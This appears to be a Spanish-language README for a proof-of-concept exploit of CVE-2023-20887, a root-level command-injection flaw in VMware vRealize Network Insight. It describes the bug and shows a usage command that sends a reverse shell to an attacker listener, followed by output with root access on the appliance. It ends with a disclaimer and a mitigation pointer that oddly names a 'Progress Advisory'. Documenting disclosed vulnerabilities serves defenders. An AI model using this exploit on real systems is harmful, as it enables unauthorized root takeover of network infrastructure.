
VMware vRealize Network Insight RCE preautenticado (CVE-2023-20887)
POC para CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) RCE no autenticado
Un análisis de la causa raíz de la vulnerabilidad se puede encontrar en mi blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) es vulnerable a la inyección de comandos cuando acepta entrada del usuario a través de la interfaz Apache Thrift RPC. Esta vulnerabilidad permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema operativo subyacente como usuario root. La interfaz RPC está protegida por un proxy inverso que puede omitirse. VMware ha evaluado la severidad de este problema dentro del rango de severidad Crítica, con una puntuación base CVSSv3 máxima de 9.8. Un actor malicioso puede obtener ejecución remota de código en el contexto de 'root' en el appliance. Las versiones de VMWare 6.x son vulnerables.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Actualice a la última versión o mitigue el problema siguiendo las instrucciones del Progress Advisory
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se cuente con autorización explícita. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo con responsabilidad.